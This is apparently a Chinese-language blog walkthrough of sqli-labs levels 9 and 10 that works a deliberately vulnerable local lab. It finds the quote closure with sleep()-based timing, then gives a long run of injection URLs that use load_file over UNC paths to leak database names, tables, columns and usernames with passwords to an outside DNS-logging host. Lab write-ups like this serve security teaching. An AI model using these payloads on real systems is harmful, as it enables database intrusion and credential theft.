sqli-labs靶场less-9和less-10

sqli-labs靶场less-9

本文只展示如何利用dnslog注入通过本关,注入原理可以参考我另外一篇文章

DSNlog注入原理

1、确定闭合方式

http://192.168.140.130/sq/Less-9/?id=1

发现id的值不论为任何值,页面回显都是一致的You are in...

判断不存在布尔注入,报错注入

用dnslog注入,构造1' and sleep(2) --+确定闭合方式

可以将单引号修改为",'),')),"),"))等,查看页面回显时间,最终确定语句为

http://192.168.140.130/sq/Less-9/?id=1' and sleep(2) --+

页面回显延迟,确定闭合方式为' '

2、平台选取

打开网址 https://eyes.sh/login ,注册账号

也可以使用其他平台,更多平台可以参考我上面提到的连接

登入进去

3、dnslog注入

构造语句

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select database()),'.zifei.eyes.sh/test.txt'))) --+

concat是为了将里面的值拼接起来

zifeiyu.eyes.sh是自己在eses.sh中注册

查看网页得到数据库名

数据库版本

爆出所有数据库

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 2,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

此处图片只列举一些

爆出security的所有表

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

爆出列名

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

爆出数据

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select concat(username,'.',password) from security.users limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

只需要修改0的值,便可以得到所有的值

less-10

本关与第九关用dnslog通过方式一样,只不过闭合方式为";其他一致

相关推荐
noravinsc27 分钟前
django admin AttributeError: ‘UserResorce‘ object has no attribute ‘ID‘
数据库·django·sqlite
王有品3 小时前
Spring MVC 多个拦截器的执行顺序
数据库·spring·mvc
极小狐3 小时前
如何使用极狐GitLab 的外部状态检查功能?
数据库·ci/cd·gitlab·devops·mcp
Leo.yuan4 小时前
数据仓库建设全解析!
大数据·数据库·数据仓库·数据分析·spark
神经毒素4 小时前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
闪电麦坤954 小时前
SQL:子查询(subqueries)
数据库·sql
活跃的煤矿打工人4 小时前
【星海出品】分布式存储数据库etcd
数据库·分布式·etcd
文牧之4 小时前
PostgreSQL的扩展 pgcrypto
运维·数据库·postgresql
萌萌哒草头将军4 小时前
⚡⚡⚡尤雨溪宣布开发 Vite Devtools,这两个很哇塞 🚀 Vite 的插件,你一定要知道!
前端·vue.js·vite
小彭努力中5 小时前
7.Three.js 中 CubeCamera详解与实战示例
开发语言·前端·javascript·vue.js·ecmascript